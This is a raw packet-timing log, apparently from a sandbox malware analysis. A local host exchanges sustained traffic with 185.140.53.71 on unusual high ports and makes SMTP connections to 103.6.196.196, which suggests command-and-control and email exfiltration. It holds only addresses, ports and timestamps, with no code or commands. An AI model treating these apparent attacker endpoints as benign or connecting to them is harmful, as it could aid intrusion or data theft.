Apr 28, 2021 20:50:48.985606909 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:48.985927105 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.986337900 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.986397028 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:48.986520052 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.986938953 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.987004042 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:48.987206936 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.987543106 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.987596035 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:48.988181114 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.988764048 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.988816977 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:48.989661932 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.989913940 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.989975929 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:48.990381956 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.991121054 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.991159916 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.991194963 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:48.991364002 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.991417885 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:48.992086887 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.992109060 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.992124081 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.992140055 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.992186069 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:48.992450953 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.992928982 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.992985010 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:48.993005991 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.993165016 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.993208885 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:48.993304968 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.993446112 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.993493080 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:48.993599892 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.993720055 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.993768930 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:48.993966103 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.994277954 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.994344950 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:48.994868994 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.995210886 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.995276928 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:48.995352030 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.995398998 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.995445013 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:48.995907068 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.996248007 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.996334076 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:48.996478081 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.996772051 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.996825933 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:48.997164011 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.997579098 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.997628927 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:48.998091936 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.998454094 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.998476028 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.998517036 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:48.999216080 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.999269009 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:48.999600887 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.999742031 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:48.999794006 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:48.999963045 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:49.000655890 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:49.000716925 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:49.001507044 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:49.001903057 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:49.001957893 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:49.002083063 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:49.002289057 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:49.002335072 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:49.002650023 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:49.003000975 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:49.003051043 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:49.003206015 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:49.003904104 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:49.003956079 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:49.004998922 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:49.005583048 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:49.005640984 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:49.005980015 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:49.007133007 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:49.007224083 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:49.007335901 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:49.007493019 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:49.007539034 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:49.007564068 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:49.008337021 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:49.008415937 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:49.009319067 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:49.010278940 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:49.010363102 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:49.011163950 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:49.011461020 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:49.011524916 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:49.011985064 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:49.012594938 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:49.012620926 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:49.012658119 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:49.012727022 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:49.012778044 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:49.013092995 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:49.013341904 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:49.013401031 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:49.013581038 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:49.013695955 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:49.013741970 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:49.014062881 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:49.014256954 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:49.014302015 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:49.014461040 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:49.014765978 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:49.014786959 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:49.014817953 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:49.015018940 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:49.015070915 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:49.015130043 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:49.015635014 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:49.015693903 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:49.015948057 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:49.016742945 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:49.016882896 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:49.016937971 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:49.018852949 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:49.018965006 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:49.022495031 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:49.025470972 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:49.025583982 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:49.025840044 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:49.028206110 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:49.028321981 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:49.031888008 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:49.048398972 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:49.048629999 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:49.048676968 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:49.099767923 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:49.115334988 CEST	49721	5471	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:49.215404034 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:49.215915918 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:49.215998888 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:49.216228962 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:49.216671944 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:49.216753960 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:49.217145920 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:49.217797041 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:49.217876911 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:49.218024969 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:49.219049931 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:49.219130993 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:49.220280886 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:49.221164942 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:49.221231937 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:49.221297979 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:49.221590042 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:49.221682072 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:49.221884966 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:49.222148895 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:49.222172976 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:49.222213030 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:49.222469091 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:49.222534895 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:49.223221064 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:49.223515034 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:49.223587990 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:49.224030018 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:49.224164963 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:49.224247932 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:49.224725008 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:49.225193024 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:49.225266933 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:49.225635052 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:49.226207972 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:49.226279020 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:49.226797104 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:49.226891994 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:49.226963997 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:49.227515936 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:49.228477001 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:49.229357958 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:49.237452984 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:49.237987041 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:49.238060951 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:49.238066912 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:49.238177061 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:49.238225937 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:49.238373995 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:49.238991976 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:49.239070892 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:49.239397049 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:49.239619970 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:49.239694118 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:49.246454000 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:49.248469114 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:49.248497963 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:49.248547077 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:49.248555899 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:49.248580933 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:49.248605967 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:49.248640060 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:49.248667002 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:49.248689890 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:49.248712063 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:49.248730898 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:49.248760939 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:49.248769999 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:49.248821974 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:49.249068022 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:49.249538898 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:49.249999046 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:49.250040054 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:49.250428915 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:49.250483990 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:49.250788927 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:49.253005028 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:49.253036022 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:49.253057957 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:49.253109932 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:49.253109932 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:49.253149033 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:49.253428936 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:49.253494024 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:49.254055977 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:49.255593061 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:49.255656004 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:49.259680033 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:49.259716988 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:49.259741068 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:49.259812117 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:49.260247946 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:49.260273933 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:49.260318041 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:49.260464907 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:49.260518074 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:49.260540009 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:49.260765076 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:49.260827065 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:49.260934114 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:49.302933931 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:49.333199978 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:49.376472950 CEST	5471	49721	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:49.632821083 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:49.632937908 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:49.881089926 CEST	49721	5471	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:49.949369907 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:49.949508905 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:50.141941071 CEST	5471	49721	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:50.257472038 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:52.131150007 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:52.178208113 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:52.219898939 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:52.553160906 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:52.648987055 CEST	49723	5471	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:52.741436005 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:52.947088003 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:52.967361927 CEST	5471	49723	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:53.361330986 CEST	5622	49715	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:53.412537098 CEST	49715	5622	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:53.476255894 CEST	49723	5471	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:53.683732986 CEST	5622	49715	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:53.725166082 CEST	49715	5622	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:53.839240074 CEST	5471	49723	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:54.352891922 CEST	49723	5471	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:54.634119034 CEST	5471	49723	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:55.172992945 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:55.228070021 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:55.242660999 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:55.555322886 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:55.625453949 CEST	49724	80	192.168.2.6	104.16.154.36
Apr 28, 2021 20:50:55.666574001 CEST	80	49724	104.16.154.36	192.168.2.6
Apr 28, 2021 20:50:55.666860104 CEST	49724	80	192.168.2.6	104.16.154.36
Apr 28, 2021 20:50:55.668230057 CEST	49724	80	192.168.2.6	104.16.154.36
Apr 28, 2021 20:50:55.710777998 CEST	80	49724	104.16.154.36	192.168.2.6
Apr 28, 2021 20:50:55.724474907 CEST	80	49724	104.16.154.36	192.168.2.6
Apr 28, 2021 20:50:55.772134066 CEST	49724	80	192.168.2.6	104.16.154.36
Apr 28, 2021 20:50:56.476916075 CEST	49724	80	192.168.2.6	104.16.154.36
Apr 28, 2021 20:50:56.520122051 CEST	80	49724	104.16.154.36	192.168.2.6
Apr 28, 2021 20:50:56.520282984 CEST	49724	80	192.168.2.6	104.16.154.36
Apr 28, 2021 20:50:57.150386095 CEST	49725	5471	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:57.289355993 CEST	49726	587	192.168.2.6	103.6.196.196
Apr 28, 2021 20:50:57.405683994 CEST	5471	49725	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:57.577646017 CEST	587	49726	103.6.196.196	192.168.2.6
Apr 28, 2021 20:50:57.579488993 CEST	49726	587	192.168.2.6	103.6.196.196
Apr 28, 2021 20:50:57.913036108 CEST	49725	5471	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:58.203125000 CEST	5471	49725	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:58.212250948 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:58.251331091 CEST	587	49726	103.6.196.196	192.168.2.6
Apr 28, 2021 20:50:58.251832962 CEST	49726	587	192.168.2.6	103.6.196.196
Apr 28, 2021 20:50:58.256808043 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:58.275347948 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:58.532615900 CEST	587	49726	103.6.196.196	192.168.2.6
Apr 28, 2021 20:50:58.533673048 CEST	49726	587	192.168.2.6	103.6.196.196
Apr 28, 2021 20:50:58.595979929 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:58.710056067 CEST	49725	5471	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:58.815630913 CEST	587	49726	103.6.196.196	192.168.2.6
Apr 28, 2021 20:50:58.816346884 CEST	49726	587	192.168.2.6	103.6.196.196
Apr 28, 2021 20:50:58.962795019 CEST	5471	49725	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:59.104113102 CEST	587	49726	103.6.196.196	192.168.2.6
Apr 28, 2021 20:50:59.104830980 CEST	49726	587	192.168.2.6	103.6.196.196
Apr 28, 2021 20:50:59.385138035 CEST	587	49726	103.6.196.196	192.168.2.6
Apr 28, 2021 20:50:59.385399103 CEST	49726	587	192.168.2.6	103.6.196.196
Apr 28, 2021 20:50:59.668490887 CEST	587	49726	103.6.196.196	192.168.2.6
Apr 28, 2021 20:50:59.669125080 CEST	49726	587	192.168.2.6	103.6.196.196
Apr 28, 2021 20:50:59.950751066 CEST	587	49726	103.6.196.196	192.168.2.6
Apr 28, 2021 20:50:59.950777054 CEST	587	49726	103.6.196.196	192.168.2.6
Apr 28, 2021 20:50:59.991204023 CEST	49726	587	192.168.2.6	103.6.196.196
Apr 28, 2021 20:51:00.137140989 CEST	49726	587	192.168.2.6	103.6.196.196
Apr 28, 2021 20:51:00.157136917 CEST	49726	587	192.168.2.6	103.6.196.196
Apr 28, 2021 20:51:00.275372982 CEST	49726	587	192.168.2.6	103.6.196.196
Apr 28, 2021 20:51:00.275790930 CEST	49726	587	192.168.2.6	103.6.196.196
Apr 28, 2021 20:51:00.437354088 CEST	587	49726	103.6.196.196	192.168.2.6
Apr 28, 2021 20:51:00.556359053 CEST	587	49726	103.6.196.196	192.168.2.6
Apr 28, 2021 20:51:00.559552908 CEST	587	49726	103.6.196.196	192.168.2.6
Apr 28, 2021 20:51:00.600666046 CEST	49726	587	192.168.2.6	103.6.196.196
Apr 28, 2021 20:51:00.685051918 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:51:00.686187029 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:51:00.979773045 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:51:01.479517937 CEST	49727	5471	192.168.2.6	185.140.53.71
Apr 28, 2021 20:51:01.734278917 CEST	5471	49727	185.140.53.71	192.168.2.6
Apr 28, 2021 20:51:02.104254961 CEST	49715	5622	192.168.2.6	185.140.53.71
Apr 28, 2021 20:51:02.241436958 CEST	49727	5471	192.168.2.6	185.140.53.71
Apr 28, 2021 20:51:02.429481983 CEST	5622	49715	185.140.53.71	192.168.2.6
Apr 28, 2021 20:51:02.429574013 CEST	49715	5622	192.168.2.6	185.140.53.71
